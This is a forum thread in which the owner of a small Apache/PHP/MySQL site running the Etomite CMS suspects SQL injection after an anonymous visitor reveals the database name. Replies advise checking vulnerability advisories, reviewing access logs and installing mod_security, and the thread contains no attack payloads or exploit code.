Dear All,

Need help on a web server. The webserver is a static one with apache,php and mysql and as manager there is etomite to change page text or create new docuements in website.
Now in feedback form of ours anonymous one posted that he/she knows the database name and also gave a sample table name. Now my question is how come it can be known?
All the urls of the website is like
http://www.site.com/index.php?id=xxx

Is there any way to find out the basckend database name from web or the table name?

Thanks for your help.

Look at http://secunia.com/advisories/produc...ask=advisories, then check your webserver and database logs for "odd" queries? You might want to severely restrict access in the meanwhile if the data is worth anything to you.

On a quick check I found 4 vulnerabilities that may apply, but they all refer to a version of etomite which is like 3 years old.
Also Secunia doesn't show anything that seems relevant and more recent than that.

Are you maybe running an ancient version? Or are there maybe any other scripts which may have been targeted?

Thanks a lot for your great suggestions.

The below one is the one which I faced earlier around three months back.
Then I updated the etomite to latest version and removed that from etomite.

I have .htaccess in place to a very restricted people in the manager folder which is etomite.

All pages are given a index as created by etomite and just the id changes. And there are only two forms where users can submit their suggesstions and feedbacks. Are they the target?

Are there any security sites which can scan my site for these sql injections or vulnerability?

Also have a look at installing modsecurity for apache, this is a intrusion detection application designed to look for various types of scan made against your server. It will look for sql injection attacks, and block them immediately.

The "good guys" have vulnerability-scanning software so there's little reason to suspect that script kiddies don't. And of course if the site's being attacked in a targeted way, the attacker wouldn't need to use automation.

As suggested above, you really ought to look at your web access logs. If you can pull together the last few months' worth of web access logs into one file, it should be fairly simple to use awk and grep to search through the file for requests that don't follow this pattern:
If you're not already monitoring your web access logs on a routine schedule or by means of some sort of IDS software, you might want to start.

Thank you all for being with me.

I am going to find him out. I have done a perl script to entry last 2 months apache access log in a mysql database. Now will search if find any unusual url and if find then I have the IP too from log.

It would be better if mysql log was also enabled but unfortunately I disabled it after running for 1 month on test basis. Found no reason to enable that actually.

In web folder I have two manager folder which are protected by .htaccess to very restricted IPs. So no way he did anything from there.
There are no login or authentication page in my website.Only two form page one for giving feedback and for contact info. He used the feedback one to declare his findings.
So there are two ways he did it; one by doing something through URL or by manipulating the 2 forms by sql injection.

Let me find out which one it is.

I am also thinking of implementing greensql for further security.

Thanks .

OK found lots of unusual stuff in apache access log for example:

and lots and lots of above with different ways.

What will be the best medicine for this; mod_security?